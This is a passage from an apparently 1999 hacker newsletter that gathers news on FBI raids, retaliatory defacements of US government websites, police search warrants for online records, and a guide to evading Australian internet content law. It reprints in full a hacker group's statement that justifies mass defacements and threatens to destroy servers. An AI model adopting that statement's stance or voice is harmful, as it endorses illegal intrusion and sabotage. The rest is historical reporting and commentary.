the technically challenged. "You no longer have to have knowledge, you just have to have the time," Clyde says. "You just download the tools and the programs. It's the democratization of hacking. And with these programs ... they can click on a button and send bombs to your network, and the systems will go down." Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and farmers. In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours. "Although the press plays up the security aspect of hacker problems," says Schneider, "the other aspect is that the systems are just not built very reliably. It's easy for operators to make errors, and a gopher chewing on a wire can take out a large piece of the infrastructure. That's responsible for most outages today." 'The prudent approach' Schneider and Clyde favor a team of specialists similar to Clinton's proposed "Cyber Corps" program, which would train federal workers to handle and prevent computer crises. But they say many problems can be eliminated with simple measures. These include "patches" for programs, using automated tools to check for security gaps and installing monitoring systems and firewalls. Fixes are often free and available on the Internet, but many network administrators don't install them. A step toward deterrence was taken in 1998 when CIA Director George Tenet announced that the United States was devising a computer program that could attack the infrastructure of other countries. "That's nothing new," says Clyde, "but it's the first time it was publicly announced. If a country tries to destroy our infrastructure, we want to be able to do it back. It's the same approach we've taken with nuclear weapons, the prudent approach." The U.S. Government Accounting Office estimates that 120 countries or groups have or are developing information warfare systems. Clyde says China, France and Israel already have them, and that some Pentagon intrusions have surely come from abroad. "We don't read about the actual attacks," says Clyde, "and you wouldn't expect to." "The Analyzer" was caught after he bragged about his feat in computer chat rooms, but Clyde says the ones to worry about are those who don't brag and don't leave any evidence behind. "Those are the scary ones," he says. "They don't destroy things for the fun of it, and they're as invisible as possible." @HWA 04.0 The hacker from an administrator's point of view ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by System (Indonesia) Note: be gentle, this was translated from Indonesian.(ESL) Hacker : An overview from An Admin point of view. by system ( 30 mei 1999 ). Hacker's is an enemy ------------------ Yes, that's true. Hacker's is an enemy for an certain of administrators. Because hacker's to them are very annoyying. They only give an admin a lot of job to do, from just maintenance the network, now plus he must watch the network, find the hole in his network, and finally fix his network. Not even in the case when the hacker's can get in to their network and break / steal / and modify the data's from their network user computers. Being an network adminitrator is not an easy way, not only he must know and understand how the network goes, he also must have the capabilities to fix unknow error or hacker's intruders in their network. [ This is what i call a good qualify admin ]. But, it is not an easy to find that kind of admin. In this world, there are to many admin that only know how to maintenance the network but cannot to find the hole in their network, or even he cannot fix the hole. What they think is " This is not my job, my job is only maintenance the network, i dont know anything else ". Well, this is the type of admin that call the hacker's an enemy, because they only think that hacker only give them a job to do. Hacker's only trying to bring down their network. He never think in the positive way. But, is this true ??? ... Hacker's is a friend. -------------------- Yes, that's true. Hacker's is a friend for a certain of administrator. They give back their passion of working become live again. The hacker's helping them for strengthen their network. An administrator that call the hacker's as their friend is what i call an high dedication of admin. Why ? Because that type of admin didn't think about the job that they must take, but they only think that this is the right time that he has waiting for, it is a time that make their job's not boring again, now they can find out the hole that exist in their network, and finally he can fix the right hole in their network. Do you ever fell how good is when you do what you like ? If you do, that is the right felling that administrator fell too. They think hacker's is not their enemy, but as their friend and their job mate that he must honouring them. Summary ------- - So, what is hackers to you ??? ########################################################################################### Any comment or suggestion are welcome, please send it to system@hackerlink.or.id You also can see it on my website at http://www.hackerlink.or.id/?hack=artikel.htm ########################################################################################### @HWA 05.0 Retaliation against the FBI continues ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Retaliation Against FBI Continues contributed by mortel The cracks of he US Senate web site and DoS attacks against the FBI web site was not the end of the protests over recent FBI actions. Last week the FBI executed up to nine search warrants mostly against members of a group known as gH or Global Hell. At this time HNN is not aware of any arrests that have been made. These actions by the FBI have upset a few people and in retaliation have attacked the US Department of Interior web site. MSNBC http://www.msnbc.com/news/273819.asp Nando Times http://www.techserver.com/story/body/0,1634,54975-87979-624391-0,00.html ABC News http://www.abcnews.go.com/sections/us/DailyNews/computer_hackers990531.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html F0rpaxe a group based in Portugal and with close connections to gH has claimed responsibility for defacing numerous web sites over the weekend (see list at bottom) and have also released a statement expressing their view about what has been going on. F0rpaxe Statement FORPAXE TECHNOLOGIES INC. STATEMENT F0rpaxe needs to inform all people what is going on. At this moment and for what we know, F0rpaxe is the only Portuguese group that is executing massive attacks on edu, gov , mil, com,servers. Maybe this is the reason why F0rpaxe is now being wanted by PJ (Portuguese police) and some international organizations like FBI and Interpol. While we had been away for a few days we had watch several events on the Portuguese media whitch in a certain way implicates F0rpaxe. Some newspapers reported that PJ is now doing their homework together with FBI to lock down "Hackers" who aleggely are involved on US hacks. Also PJ is now our BIG BROTHER since they are gathering efforts to make a net surveillence over POrtugual. For what it seems they have the help of Portuguese ISP's like Telapac. Their goal is to track down hackers... In an article of "EuroNoticias" they call hackers to the ones who use trojans to steal accounts (l0l). If PJ thinks that this is their biggest problem then that info about working together with the FBI is a bulshit... Portugal is now passing through serious or hilarious actions.. IF the goal of PJ is to track down people who use trojans to steal accounts then they have to arrest all population. We think that this isn't their main goal since F0rpaxe had been informed that PJ is trying to get solide proofs that we are the responsables for all those hacks. PJ doesn't scare anyone. IF FBI is really working together with PJ then they are doing this only because of us...most certainly to erase us from the system... FBI had been mounting schemes to track us down.... FBI had already tried to pretend being Iron-Lungs to get info about our current hacks, if we still had acess to gov servers, if we had copyed military databases and all that sort of things... The real I-L reported that the fake I-L wasnĄt him. The guy was always asking things and we just ignored...it could be just a lamer trying to get some info about us... But then the attemptives to track us down started: the guy started to contact people who are closed to F0rpaxe ,like some fo attrition staff, in order to get our contact like phone etc... They even asked some of them to phone us.... When they realized that we had discover they started trying to get info from all those who surround us...a few days later an article on a newspapper reported that FBI and PJ were (or are?) working together... We don't know if all this is the truth or only a misunderstanding but one thing we know FBI really want us bad and they will do anything to caught us. We think that FBI doesn't want us just because of all the hacks but to show that they have the authoritie to arrest hackers of other country's. Although they need the permissions of the government and that isn't easy. They should be tired of making American Hackers life miserable and now they want to do the same with us....... As we told before we had been away for a while because things were starting to be pretty badÖ Groups who work on the shadow Some groups just disappear but they don't disappear trully..They start working on the shadow because FEDS are always ready to take them down...We thought that it would't happen that with us but sooner or later we will need to go back to where we belong...to the shadow. We also take this chance to show our support with people who are now facing legal troubles, like I-L, dk, Zyklon.....Kevin and all the others who will face them in the futureÖ gH has also our support. Information in Portugal Portuguese media isnÔt aware of all this.... neither some admins who were hacked and nothing was reported....In Portugal people don't care about what happens...They aren't aware that there are people building an underground system. Ity's just that. On CNN, ZDNET, Wired etc.. they inform what's happening.... In Portugal the media just doesn't give a shit.... Maybe this is the best for us since this will prevent a media hype and PJ and other FEDS won't be after us so soon..but information isn't circulating as it should. People built a bad image of the "hacker". Portuguese media report "hackers" as being the ones who use trojans... Man....they arten't aware of the true meaning of the concept "hacker" They should think about it... Why are we doing this? We agree with some of the things that had been said by some groups. We are always hacking and for what? We hack and hack things whitch can be fixed in 2 minutes. In fact we could have done worse like destroying completely all servers. We can do it if we w ant but hackers are waiting for justice. If FBI doesnĄt stop we wonĄt and we can start destroying. We think that FBI should explain what a fuck they are doing. For the moment we wonĄt destroy the servers we hack but if it is necessary we can burn alot of servers. For example this gov server could be erased completly. Everyone should think about this, about whatĄs happening. Don't make all this a media hype just inform in a simple manner....people need to know. People need to know why all this hacks. People need to know who FBI really is. MSNBC; Tough talk amid new Web assaults White House and federal agencies lay down the law while computer attackers hit another federal Internet site By Alan Boyle, Bob Sullivan and Brock Meeks June 1 — The White House, Pentagon, Justice Department and FBI all addressed a rash of electronic attacks on federal Web sites Tuesday, even as the attackers hit new targets. The protest campaign against last week’s FBI raids on computer users spilled across global cyberspace, from the Pacific to Europe. THE WEB ONSLAUGHT began nearly a week ago, after FBI agents served search warrants on members of the hacker community in Washington state, Texas, California and other areas of the country. The raids — which were aimed at gathering evidence related to past computer intrusions as well as unauthorized use of telephone systems — sparked attacks that forced the shutdown of the FBI and U.S. Senate Web sites last week. After beefing up security, the Senate site is back in service, but the FBI site is still inaccessible. Scores of protest pages have rudely taunted the FBI, and government officials laid down the law at several news briefings Tuesday. “Cyber-security is something the government takes very seriously,” White House spokesman Joe Lockhart said in response to a reporter’s question. “I know that there have been a series of attempts (to break into government computers) with some success, some without success. ... We take it very seriously. We are constantly reviewing and will continue to review the security measures we have.” Last month, a group known as Global Hell, or gH, was implicated in attacks on the White House Web site as well as sites for several Cabinet departments and the U.S. Information Agency. Also last month, Global Hell member Eric Burns, who also goes by the name Zyklon, was indicted in connection with attacks on three computers, including the USIA system. White House Web site shut down Lockhart emphasized that those implicated in the latest wave of attacks were liable to face a similar fate. “For those who think that this is some sort of sport, I think (it will be) less fun when the authorities do catch up with them ... and these people are prosecuted,” he said. At another briefing, Pentagon spokesman Kenneth Bacon said system administrators were briefly limiting Web access Tuesday so they could beef up security. He said such measures would make it “much more difficult” to deface Pentagon Web pages. “It has not been a major problem,” Bacon said. “This is much more protective than reactive. It’s looking to the future to prevent the types of problems (seen) at other agencies.” Federal law-enforcement officials emphasized the harsh criminal penalties that Web intruders could face: Attackers who cause $5,000 worth of damage in one year could be charged with a federal felony that carries up to five years in prison, the head of the Justice Department’s computer crime section, Scott Charney, told The Associated Press. Merely gaining unauthorized access to a government computer could bring a year in jail, but Charney pointed out that the cost of fixing a compromised Web site could mount to $5,000 in employee time alone. A Dallas telecommunications company suffered a considerable loss — perhaps ranging into millions of dollars — because of intrusions that are the subject of the FBI’s current investigation, bureau spokesman Frank Scafidi said. “What we investigate are violations of law,” he told MSNBC. “If a hacker feels that our investigating somebody’s illegal activity is somehow an infringement on that individual’s freedom to do what he wants to do, then there is a basic misunderstanding of the way this country works.” Scafidi said there was “no intention on our part to select a group of people and pick on them. ... They get the first move in this game.” But he also indicated that the justice system intended to have the last word. “When there is a violation ... we will pursue it, and usually we will knock on somebody’s door and maybe take some computer equipment,” he said. Such equipment may have to be held for months or years, to be used as evidence in a trial or during the appeal process, he said. As for the FBI site’s down time, Scafidi said: “That isn’t affecting the FBI’s investigative response in any way. It is a problem for us in that we rely on our Web site as a place for anybody to go and get information on the FBI for any purpose ... so it is a public information resource for us, and since it has been down it has really been affecting a lot of innocent parties out there.” THE LATEST VICTIMS Tuesday’s governmental victim was the General Services Administration, which manages U.S. government property. At least three pages on the Web site for the GSA’s Office of Governmentwide Policy — www.policyworks.gov — were briefly replaced with protest pages. “Our sentence is hacking everything we can as a protest to FBI current actions,” one page read. The hacked pages were accessible for 10 to 15 minutes, said Joe McKay, director of office information systems at the Office of Governmentwide Policy. He said the attacker apparently gained access through a security gap related to file transfer protocol, or FTP. “We’ve terminated all FTP services, and I am issuing on a need-to-use basis new FTP access,” he told MSNBC. The site was working normally Tuesday night, and computer server logs were being analyzed for further clues, he said. “We’re always playing catch-up, it seems,” he said. “It’s important to show (the attackers), ‘Hey, you got us, but we’re OK now.’ ” The hacked pages claimed credit on behalf of a group called Forpaxe, including a member using the handle “M1crochip.” Similar credits appeared on hacked pages placed Tuesday on Web servers at Monash University in Australia and Coca-Cola’s Belgian subsidiary, as well as a page that briefly appeared Monday at the Idaho National Engineering and Environmental Lab’s Web site. The hacked pages indicated that M1crochip lived in Portugal — which others in the hacker community confirmed. Another computer user said to be involved in the current wave of Web attacks reportedly lived in Britain. BACKGROUND ON THE FBI RAIDS Members of Global Hell reported that law-enforcement officials served search warrants last Wednesday in Texas, California and Washington state. AntiOnline, a Web site focusing on the hacker community, indicated that the sweep extended to other states as well. One of the subjects of the search warrants was a contractor working at Microsoft, which is a partner in the joint venture that operates MSNBC. When contacted by MSNBC, the contractor — who uses the online handle “VallaH” — confirmed that nine law-enforcement agents served him with a warrant at his Seattle-area apartment, interrogated him and confiscated computer equipment. He said he was not involved in any illegal activity and surmised that he was implicated by a former associate in the hacker community. FBI agents also contacted Microsoft, said company spokesman Adam Sohn. “This is an active investigation, and there’s not a lot we can say,” Sohn said Monday. “It’s an FBI matter, it’s not a Microsoft matter.” He indicated that FBI agents were interested in computer equipment that VallaH used at Microsoft. “As far as I have been told, we are still in possession of the property. However, we’re cooperating with the FBI in the investigation,” Sohn said. VallaH said he was told not to report for work at Microsoft. “We did ask that his assignment at Microsoft be terminated. I don’t know what his status is with his contracting agency,” Sohn said. MEANWHILE, IN HOUSTON ... In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating “allegations of computer intrusions” involving, among others, a teen-ager who uses the hacker handle “Mosthated.” In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were “really mad. ... The computer had all their financial information and stuff on it.” Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was “really mad.” Mosthated said at least eight other people around the country had been served with search warrants as part of “a huge hacker crackdown.” Four other Houston-area hackers, three in California and one in the Seattle area reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said. Media representatives at FBI offices in San Diego and Seattle said they could not comment on the investigation. Do you have a tip related to this story? Please send your suggestions to tipoff@msnbc.com. ABC; Hackers Strike Again Deface Interior Department and Supercomputer Lab Web Sites By Ted Bridis The Associated Press W A S H I N G T O N, June 1 — A spate of high-tech vandalism against the government continued this week, as computer hackers defaced two more federal Web sites and left a taunting note promising to attack other sites because of a related FBI investigation. Hackers from different organizations defaced Web sites Monday for the Interior Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming “it’s our turn to hit them where it hurts.” “These are the perils of open government,” said Stephanie Hanna, an Interior spokeswoman. “We try to make as much of the materials of the Interior Department as open and available as possible. The consequence of that is, those who choose to do damaging things can do that.” Messages left at the attacked sites suggest they were vandalized to retaliate against what was said to be the FBI’s harassment of specific hacker groups, including the group that boasted of breaking into the White House site last month. The FBI confirmed it executed four search warrants last week in Texas related to an investigation into allegations of computer intrusion, including one search at the home of a prominent hacker in Houston. FBI Took Down Site Last Week Last week, hackers claiming to be from another group defaced the Web site for the Senate, causing it to be taken offline through the weekend. The FBI also was forced to take down its own Internet site last week after hackers launched an electronic attack against it. It remained inaccessible Monday, along with the Web site for its National Infrastructure Protection Center, which helps investigate computer crimes. On Interior’s Web page, the hackers left a message Monday saying they were “going after every computer on the Net with a .gov (suffix). ... We’ll keep hitting them until they get down on their knees and beg.” At the site maintained by the Idaho National Engineering and Environmental Laboratory, a note threatened the electronic destruction of the powerful computers that “serve” pages on the Internet “if the FBI doesn’t stop.” “We could have done worse, like destroying completely all servers,” the note said. “We can do it if we want, but hackers are waiting for Justice.” Warnings of More to Come In an online interview with The Associated Press, the hacker claiming responsibility for the laboratory attack warned that further FBI investigation would result in more severe damage. The hacker identified himself only as M1crochip, living in Portugal and part of a group calling themselves F0rpaxe. The interview was arranged through a mutually trusted third party. “If FBI doesn’t do anything and doesn’t stop arresting people and making our life miserable, each member of F0rpaxe will discuss an eventual destruction of every single server,” he said. “If that happens, everything goes down.” He added, “We don’t want to proceed that way,” and called the electronic attacks the “only resource” of the hacker community. The FBI in Washington declined comment Monday. Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns reportedly is known on the Internet as “Zyklon” and is believed to be a member of the group that claimed responsibility for the attacks on the White House and Senate sites. “Zyklon” was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. Burns was accused of breaking into a computer used by the U.S. Information Agency between August 1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington. Nando Times; Two more federal Web sites hacked Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TED BRIDIS WASHINGTON (June 1, 1999 7:40 a.m. EDT http://www.nandotimes.com) - A spate of high-tech vandalism against the government continued this week as computer hackers defaced two more federal Web sites and left a taunting promise to attack other sites because of a related FBI investigation. Hackers from different organizations defaced Web sites Monday for the Interior Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming "it's our turn to hit them where it hurts." "These are the perils of open government," said Stephanie Hanna, an Interior spokeswoman. "We try to make as much of the materials of the Interior Department as open and available as possible. The consequence of that is, those who choose to do damaging things can do that." Messages left at the attacked sites suggest they were vandalized to retaliate against what was said to be the FBI's harassment of specific hacker groups, including the group that boasted of breaking into the White House site last month. The FBI confirmed it executed four search warrants last week in Texas related to an investigation into allegations of computer intrusion, including one search at the home of a prominent hacker in Houston. Last week, hackers claiming to be from another group defaced the Web site for the Senate, causing it to be taken offline through the weekend. The FBI also was forced to take down its own Internet site last week after hackers launched an electronic attack against it. It remained inaccessible Monday, along with the Web site for its National Infrastructure Protection Center, which helps investigate computer crimes. On Interior's Web page, the hackers left a message Monday saying they were "going after every computer on the Net with a .gov (suffix). ... We'll keep hitting them until they get down on their knees and beg." At the site maintained by the Idaho National Engineering and Environmental Laboratory, a note threatened the electronic destruction of the powerful computers that "serve" pages on the Internet "if the FBI doesn't stop." "We could have done worse, like destroying completely all servers," the note said. "We can do it if we want, but hackers are waiting for Justice." In an online interview with The Associated Press, the hacker claiming responsibility for the laboratory attack warned that further FBI investigation would result in more severe damage. The hacker identified himself only as M1crochip, living in Portugal and part of a group calling themselves F0rpaxe. The interview was arranged through a mutually trusted third party. "If FBI doesn't do anything and doesn't stop arresting people and making our life miserable, each member of F0rpaxe will discuss an eventual destruction of every single server," he said. "If that happens, everything goes down." He added, "We don't want to proceed that way," and called the electronic attacks the "only resource" of the hacker community. The FBI in Washington declined comment Monday. Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns reportedly is known on the Internet as "Zyklon" and is believed to be a member of the group that claimed responsibility for the attacks on the White House and Senate sites. "Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. Burns was accused of breaking into a computer used by the U.S. Information Agency between August 1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington. @HWA 06.0 Threat to online privacy: The Search Warrant ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ New Threat to Online Privacy, The Search Warrant contributed by mortel This article gives the impression that some of todays legal practices are a good anti crime thing but judges are handing out search warrants that cover online communications like candy. That email from your doctor is just as much fair game as the one from your secret lover. Judges must be educated so that limits can be placed on these things. A choice quote from the article "AOL is extremely law-enforcement friendly," Ron Horack of the Loudoun County, Va., sheriff's department said, "They don't hold anything back." ABC News http://www.abcnews.go.com/sections/tech/DailyNews/privacy990528.html What We Leave Behind Online Activities Become Open Trail for Authorities By Calvin Woodward The Associated Press L E E S B U R G, Va., May 28 — Go for a walk, drive a car or dance in the moonlight and chances are, no one notices. Journey on the Internet and a trail is left. And police are hot on that trail in a growing number of criminal investigations. Armed with search warrants, police are looking into the online activities of suspects, and sometimes victims, by seizing evidence from Internet service providers and finding material that people online never dreamed would end up in the hands of the law. Private e-mail between lovers. The threatening missives of haters. The true identities of people hiding behind screen names in a medium they thought was the essence of secrecy. Va. Sheriff Helps Get AOL Help “Ultimately, if you break the law, it can be traced,” said investigator Ron Horack of the Loudoun County, Va., sheriff’s department. Horack helps police around the country apply for search warrants to get material from the county-based America Online, the world’s largest Internet service provider with 18 million customers. “I know who you are and where you live,” an anonymous hatemonger e-mailed a 12-year-old girl in Lancaster, Pa. By peeking into the accounts of Internet providers, police can often say the same thing: They know who the threatening people are and where they live. This week federal authorities said they had charged a northern Virginia pediatrician with possessing child pornography after investigating his AOL account and finding at least 22 explicit images sent to him via e-mail over the course of nearly six months. They said they then found more child pornography on his computer. The doctor could not immediately be reached for comment. Wide Powers of Warrant With a warrant, law enforcement authorities can look at the electronic mail and other online communications of people suspected of a range of serious crimes, getting information not just from a home computer but often the company that provides the Internet, e-mail or chat service. They can do the same with victims, in the process seeing mail from people who corresponded with them but had nothing to do with a crime. Everything from humdrum to-do lists to love letters from illicit digital dalliances becomes potential evidence, and eventually a matter of public record. “It is a growing risk to privacy,” said Marc Rotenberg, executive director of the Electronic Privacy Information Center, who says police should stick to traditional methods such as stings, informants and forensic evidence, which don’t invade people’s communications. Said Horack: “If they’re going to use the Internet for their crime, we’re going to use the Internet to catch them.” Used in Littleton Investigation Authorities turned to AOL to see some of the online activities of the two high school students who killed 13 other people and themselves in Littleton, Colo., last month. They’ve used it to try to track down some of the copycat threats that have closed many schools since. They took the same route, thus far with inconclusive results, after a woman in Pennsylvania was told in a chat room, “I guarantee you I will hurt you if you don’t listen to me,” and when a man in New York was charged with attempted murder of his wife, who, police say, was having a passionate online encounter her husband happened to see. “AOL is extremely law-enforcement friendly,” Horack said. “They don’t hold anything back.” America Online tells its nearly 18 million customers it won’t read or disclose private communication or personal identifying information except under a “valid legal process.” Most ISPs Have Similar Rules Other major Internet service providers, or ISPs, as well as separate online e-mail services and Internet hubs like Hotmail and Yahoo, say much the same, although the disclaimers may be hard to find in screens of small print. “We have a long-standing policy of cooperation with law enforcement,” said AOL spokesman Rich D’Amato. Communications such as e-mail are disclosed only in criminal investigations and with a warrant, he says. In response to orders in civil cases, AOL may give out information allowing someone’s real name to be matched to a screen name. So if a spouse is found to be having an online affair with someone known only as Heart4U, the identity of that cyberlover might eventually be uncovered in a divorce proceeding. Chat Rooms Not That Anonymous Raytheon Inc. obtained subpoenas to identify 21 people, most of them employees, said to have been spreading corporate secrets and gripes in an anonymous online chat room. It then dropped a lawsuit it had brought against the 21, each identified as “John Doe,” indicating to privacy experts that the company had gone to court in the first place only to learn the identities of the chatters. Four employees quit; others entered corporate “counseling.” Privacy advocates worry that authorities could go on increasingly invasive fishing expeditions. “There are simply many more events that are recorded (online) that would not be recorded in the physical world,” said Rotenberg. “I think it is going to become an enormous problem as people become more and more dependent on ISPs.” Anonymous Options Fight Back Meanwhile, tools continue to be developed to protect anonymity — a site called anonymizer.com, for one, will relay e-mail, stripping out the sender’s identifying information. So far, at least, few warrants going to AOL look like goose chases, an impression formed after a review of the more than 100 that have been filed in Leesburg this year. Most involve alleged pedophiles, stalkers and harassers who have used the Internet to find prey and left evidence of their intentions with victims or undercover police. Horack prepares warrant applications for police from other parts of the country, some so new to digital detective work they need their children’s help to get online. Once they are approved by a magistrate, he takes them to AOL and retrieves the information. It’s almost a full-time job, offered by the sheriff because the company gives such a big boost to the county. Works Well With Pedophile Search The warrants are especially effective against child pornographers, Horack says. “Pedophiles are pack rats. They don’t throw away anything.” Even when they do delete material from their computer, it might be found at the service provider. In the case of the 12-year-old Pennsylvania girl, nothing turned up in the AOL search. Most of the time, something does. For example, police in Hendersonville, Tenn., turned to AOL to see the Internet activity of Dennis Wayne Cope, 47, shot and found dead in a crawl space of his home in February. In an affidavit seeking access to Cope’s e-mail, “buddy list content” and other online activities, police said he had been corresponding online with the estranged wife of suspect Robert Lee Pattee. They also say Pattee’s hand print was found at the scene. Pattee has been charged with first-degree murder. @HWA 07.0 2600 in Aussieland bares its teeth at the current clampdown on The Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2600.org.au Issues Instructions for Legally Circumventing the Law contributed by webmaster The Australian government is introducing internet content regulation this week despite extensive opposition from free speech advocates and technical advisors. Given that fighting the law itself is now apparently futile, 2600 Australia has critiqued the law and described apparently legal ways in which you can evade it. We're not sure what the fallout from spelling out how to (legally) evade the law will be, but take a look while you can... 2600.org.au 2600.org.au Issues Instructions for Legally Circumventing the Law contributed by webmaster The Australian government is introducing internet content regulation this week despite extensive opposition from free speech advocates and technical advisors. Given that fighting the law itself is now apparently futile, 2600 Australia has critiqued the law and described apparently legal ways in which you can evade it. We're not sure what the fallout from spelling out how to (legally) evade the law will be, but take a look while you can... 2600.org.au http://www.2600.org.au/censorship-evasion.html Interesting reading, check it out. Evading the Broadcasting Services Amendment (Online Services) Act 1999 by Dogcow Reference Links: US Mirror - US Mirror of this document (for obvious reasons) http://members.xoom.com/2600aus/censorship-evasion.html Broadcasting Services Amendment (Online Services) Act 1999 - PDF format http://www.aph.gov.au/parlinfo/billsnet/99077.pdf Broadcasting Services Amendment (Online Services) Act 1999 - HTML format http://www.ozemail.com/~mbaker/amended.html Senate Select Committee on Information Technologies - Index http://www.aph.gov.au/hansard/senate/commttee/s-it.htm Squid - an open source proxy server http://www.nlanr.net/Squid/ NLANR Cache - an open proxy hierarchy http://www.nlanr.net/Cache/ Anti CensorWare Proxy - Masks the URL you're accessing http://ians.978.org/rdrp-c/ Free S/WAN - an IPSEC implementation for Linux http://www.xs4all.nl/~freeswan PGP - International download site http://www.replay.com/menu/pgp.html SSL - Open Source SSL implementation http://www.openssl.org/ FTP by email - instructions ftp://rtfm.mit.edu/pub/usenet/news.answers/internet-services/access-via-email BugTraq Mailing List - Web Archive http://www.netspace.org/lsv-archive/bugtraq.html Words filtered by iFilter - Thanks to Danny Yee http://www.anatomy.usyd.edu.au/danny/freedom/censorware/ifilter.html Introduction Australia's citizens are about to be subject to content regulation on the Internet following the introduction of an amendment to existing legislation relating to broadcasting services. This legislation defines certain responsibilities for the ABA (Australian Broadcasting Authority), the OFLC (Office of Film and Literature Classification) and any company or individual providing public access to "Internet content". All rhetoric aside about "big brother" and how this legislation spells the end of free speech in this country, it is acknowledged by most if not all participants in the debate about this legislation that, for a number of reasons it will be very difficult if not impossible to effectively stem the tide of what the government calls "illegal and offensive material". This paper has one aim - to highlight the futility of attempting such content regulation by explicitly describing the legal means by which citizens can evade the provisions within the legislation. Warning I believe that all Australian laws should be in language understandable by ordinary Australians. This paper is my interpretation of the Broadcasting Services Amendment (Online Services) Act 1999 and should not be construed as anything more than this. Just as I believe what you view on the Internet should be your own responsibility, if you choose to follow any of my suggestions here, it's your sole responsibility to deal with any adverse or unforseen consequences of those actions. That said, if you disagree with anything I've said here, feel free to contact me. The means of evasion... I should point out that most of these means of evasion assume that the content you want to access is outside the country and therefore beyond the effective reach of the "take down notices" mentioned in the legislation. Use an alternate proxy network - connect to a different proxy server on a non-standard port Mask web content before entering the proxy network - change some words, change some server names Encrypt the content - they can't regulate what they can't read Encrypt web content before it enters the proxy network Use an encrypted VPN/tunnel for streaming content Distribute content by means of a "company" to your "employees" Offer on-demand, point-to-point email access to content Flood the ABA with legitimate, appropriate complaints Use a "recognised alternative access prevention arrangement" Mirror content so widely as to prevent effective enforcement of the legislation Use an alternate proxy network You should be able to access any content you wish by connecting to a proxy server network outside Australia either directly from your browser on a port other than 80, 3128 or 8080 (the most popular proxy server ports, and the ones most likely being transparently proxied) or using a Squid-like cache internal to your network that accesses a proxy hierarchy outside Australia on a port other than 3130 (the standard ICP port). This assumes that the government does not mandate the use of a packet level filter, regardless of how ineffective one might be at locating banned content in a stream of data passing through it and preventing access to it. If it were to do this, it would most likely be done using an industry standard able to be defined under Part 5 of the legislation. Transparent proxying, for those unsure of it's meaning, is the process of redirecting a users' outgoing web content request through a network switch capable of what's called layer 3 routing. Layer 3 routing enables the network switch to invisibly redirect the web content request away from the intended destination into a proxy server which then fetches the web content for you, assuming it's not been configured to block certain URLs or certain media types (mpg movies, for example). Mask web content before entering the proxy network Assume your ISP uses transparent proxying methods to pass all web content through a filter of some kind. What about masking the web content in some way at the server (aka "internet host") end such that when it passes unhindered through the proxy network, your computer can unmask the information, making it visible to you . A basic example of this, but one that only masks the URL you're trying to access is accessible here. The Youth Alliance against Internet Censorship offers information on software for your computer that can disable a proxy server here. Encrypt the content before it enters the proxy network Above, I mentioned the ability to mask content on the server side before it passes through the proxy network. The same concept can applied to any Internet content using encryption. This could be achieved using a traditional SSL-based transaction between a server and your own computer, by means of a PGP-based transaction with an appropriately configured server, or by using any other form of encryption that prevents decryption by anyone other than yourself. Use an encrypted VPN/tunnel for streaming content A VPN is a Virtual Private Network. It allows physically separate networks to operate in a homogenous fashion by encrypting packets at one particular "endpoint", tunnelling them (sending in a point-to-point fashion) across the internet, then decrypting them at some other "endpoint", protecting the information being passed between the two networks. A typical use of a VPN is by a company with offices in different cities or in different countries. VPN technologies are offered by a number of major networking vendors including Cisco, Bay Networks and Ascend, though usually with a fairly high price tag attached. At a more grass roots level, end users can download and use a product called SSH (Secure Shell) to give them secure network access to UNIX shells and set up encrypted tunnels between two hosts. For Linux users, the kernel comes with tunnelling code built-in and can be made secure with IPSEC patches available from the Netherlands. Distribute content by means of a "company" to your "employees" The legislation allows for information to be distributed to an end-user provided they are within your "immediate circle" and is described in Subclause 9(1-4): 9 Supply to the public (1) This clause sets out the circumstances in which an Internet carriage service is taken, for the purposes of subclause 8(1), to be supplied to the public. (2) If: (a) an Internet carriage service is used for the carriage of information between 2 end-users; and (b) each end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public. Note: If a company makes Internet content available for access on the Internet, and an individual obtains access to the content using an Internet carriage service, the company and the individual are end-users in relation to the carriage of the content by the Internet carriage service. (3) If: (a) an Internet carriage service is used to supply point-to-multipoint services to end-users; and (b) at least one end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public. (4) If: (a) an Internet carriage service is used to supply designated content services (other than point-to-multipoint services) to end-users; and (b) at least one end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public. The thing to note here are the words "immediate circle". Jumping back up in the document to the definition, we note it refers to the Telecommunications Act of 1997. Jumping to the (rather long) definition in that legislation, we find that your "immediate circle" refers to employees if you are a company: Immediate circle SECT. (1) For the purposes of this Act, a person's "immediate circle" consists of the person, together with the following persons: (a) if the person is an individual--an employee of the individual; continued... In theory, using this aspect of the legislation, you could create a company and employ individuals interested in the banned content you have on offer. Far fetched, but apparently possible. The definition, interestingly, would also allow a University to offer banned content to it's employees and students. Offer on-demand, point-to-point email access to content In the early days of the commercial internet, before the invention of the World Wide Web, not everybody had access to the 